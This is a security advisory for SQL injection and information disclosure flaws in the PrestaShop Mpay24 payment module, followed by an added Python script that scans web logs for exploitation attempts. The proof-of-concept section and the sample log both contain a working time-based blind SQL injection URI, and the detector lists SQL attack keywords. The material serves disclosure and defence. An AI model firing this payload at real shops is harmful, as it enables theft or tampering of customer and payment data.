PrestaShop Mpay24 Payment Module Information Disclosure and SQL Injection Vulnerabilities
| Bugtraq ID: | 69560 |
| Class: | Input Validation Error |
| CVE: | CVE-2014-2008 CVE-2014-2009 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 03 2014 12:00AM |
| Updated: | Sep 03 2014 12:00AM |
| Credit: | Eldar Marcussen |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Mpay24 Payment Module is prone to an information-disclosure vulnerability and an SQL-injection vulnerability.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database and gain access to sensitive information. Other attacks are also possible.
Mpay24 Payment Module 1.5 and prior are vulnerable.
Exploit / POC
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+
Solution / Fix
Solution:
Reportedly, the issue is fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
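The following check is an added example, not part of the original advisory or the module's code: it scans web server access-log lines for requests to the module's confirm.php whose parameters carry SQL syntax like the example URI above. The combined log format, the allow-list pattern for legitimate values, the function names and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names come from the advisory's example URI.
TARGET_SUFFIX = "/modules/mpay24/confirm.php"
WATCHED_PARAMS = ("TID", "MPAYTID", "STATUS")
# Assumption: legitimate values are short tokens without quotes, spaces or parentheses.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# SQL syntax seen in the example URI, plus two common relatives (sleep, union).
SQL_MARKERS = re.compile(r"\b(select|benchmark|substr|sleep|union)\b|@@|--|'", re.I)
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_request(uri):
    """Return (param, reason, decoded_value) findings for one request URI."""
    parts = urlsplit(uri)
    if not parts.path.endswith(TARGET_SUFFIX):
        return []
    findings = []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SQL_MARKERS.search(value):
                findings.append((name, "sql-syntax", value))
            elif not SAFE_VALUE.fullmatch(value):
                findings.append((name, "unexpected-characters", value))
    return findings

def scan_log(lines):
    """Return [(line_number, findings)] for log lines with suspect module input."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = inspect_request(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits

# Constructed sample log: line 2 carries the query string from the advisory's example URI.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Sep/2014:10:00:01 +0000] "GET /path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=abc&TID=1042 HTTP/1.1" 200 12',
    '203.0.113.9 - - [03/Sep/2014:10:00:05 +0000] "GET /path/modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+ HTTP/1.1" 200 12',
    '203.0.113.7 - - [03/Sep/2014:10:00:09 +0000] "GET /path/index.php?id=5 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        for name, reason, value in found:
            print(f"line {number}: {name} {reason}: {value!r}")
```

Because the example payload uses BENCHMARK to delay the response, correlating flagged lines with unusually long response times in the same log can help separate probing from malformed but benign input.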
References
References:
- PrestaShop Homepage (PrestaShop)